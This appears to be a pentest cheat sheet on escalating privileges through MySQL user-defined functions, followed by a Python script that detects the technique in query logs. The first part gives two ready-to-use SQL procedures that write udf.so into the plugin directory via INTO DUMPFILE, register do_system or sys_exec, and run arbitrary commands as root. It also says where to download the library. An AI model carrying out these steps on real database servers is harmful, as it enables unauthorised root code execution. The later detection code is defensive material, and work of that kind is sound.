MySQL exploit

MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit

Requirements

  1. MySQL running as root

  2. Insecure handling of files

  3. Plugin directory knowledge

.so file download

Download from github:metasploit-framework

Method 1 (access to box):

mysql -uroot -p<PASS>
> USE mysql;
> CREATE table kashz(line blob);
> INSERT INTO kashz VALUES(load_file('/PATH/udf.so'));
> SELECT * FROM kashz INTO dumpfile '/PLUGIN-DIR/udf.so';

# create function 
> CREATE FUNCTION do_system RETURNS integer soname 'udf.so';
> SELECT * from mysql.func;

# run RCE
> SELECT do_system('RCE');

Method 2 (no access to box):

  • Hex-encode udf.so (the result is the <SHELLCODE-DATA> value below): xxd -p udf.so | tr -d '\n' > udf.so.hex

> SELECT @@plugin_dir;
> SET @shell = 0x<SHELLCODE-DATA>;
> SELECT binary @shell into dumpfile 'PLUGIN-DIR/udf.so';

# create function
> CREATE FUNCTION sys_exec RETURNS int soname 'udf.so';
> SELECT * FROM mysql.func;

# run RCE
> SELECT sys_exec('RCE');
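
Detection for the statements both methods depend on (a library written with INTO DUMPFILE, then CREATE FUNCTION ... SONAME), as an added example that is not part of the original page. The log lines are a constructed, simplified form of the MySQL general query log; the plugin directory path, the allowlist and the rule names are assumptions.

```python
import posixpath
import re

# Constructed sample: "<timestamp> <connection id> Query <statement>", one statement per line.
SAMPLE_LOG = """\
2024-01-01T10:00:01.000000Z    12 Query SELECT @@plugin_dir
2024-01-01T10:00:05.000000Z    12 Query SELECT binary @shell into dumpfile '/usr/lib/mysql/plugin/udf.so'
2024-01-01T10:00:09.000000Z    12 Query CREATE FUNCTION sys_exec RETURNS int soname 'udf.so'
2024-01-01T10:00:12.000000Z    13 Query SELECT id FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'
2024-01-01T10:00:15.000000Z    14 Query CREATE FUNCTION metaphon RETURNS STRING SONAME 'udf_example.so'
"""

LINE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
DUMPFILE = re.compile(r"INTO\s+DUMPFILE\s+'([^']+)'", re.I)
CREATE_UDF = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(\S+)\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'",
    re.I)

def detect(log_text, plugin_dir, allowed_sonames=frozenset()):
    """Return (conn_id, rule, detail) findings for UDF library drops and loads."""
    findings, dropped = [], set()  # dropped: library basenames written via DUMPFILE
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # not a Query line in the assumed format
        conn, sql = int(m.group(2)), m.group(3)
        d = DUMPFILE.search(sql)
        if d:
            path = posixpath.normpath(d.group(1))
            in_plugin_dir = path.startswith(posixpath.normpath(plugin_dir) + "/")
            if in_plugin_dir or path.endswith((".so", ".dll")):
                dropped.add(posixpath.basename(path))
                findings.append((conn, "library-written-via-dumpfile", path))
        c = CREATE_UDF.search(sql)
        if c:
            func, soname = c.group(1), c.group(2)
            if soname in dropped:  # library came from SQL, not from a package install
                findings.append((conn, "udf-loaded-from-dropped-library", f"{func} <- {soname}"))
            elif soname not in allowed_sonames:
                findings.append((conn, "udf-from-unapproved-library", f"{func} <- {soname}"))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG, "/usr/lib/mysql/plugin/", {"udf_example.so"}):
        print(finding)
```

Pass the value of `@@plugin_dir` from the server being monitored, and compare alerts against the current contents of `mysql.func`.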

References

  • https://www.exploit-db.com/exploits/1518

  • https://github.sofianehamlaoui.fr/Security-Cheatsheets/databases/mysql/mysql-root-to-system-root/

  • https://gist.github.com/p0c/8587757
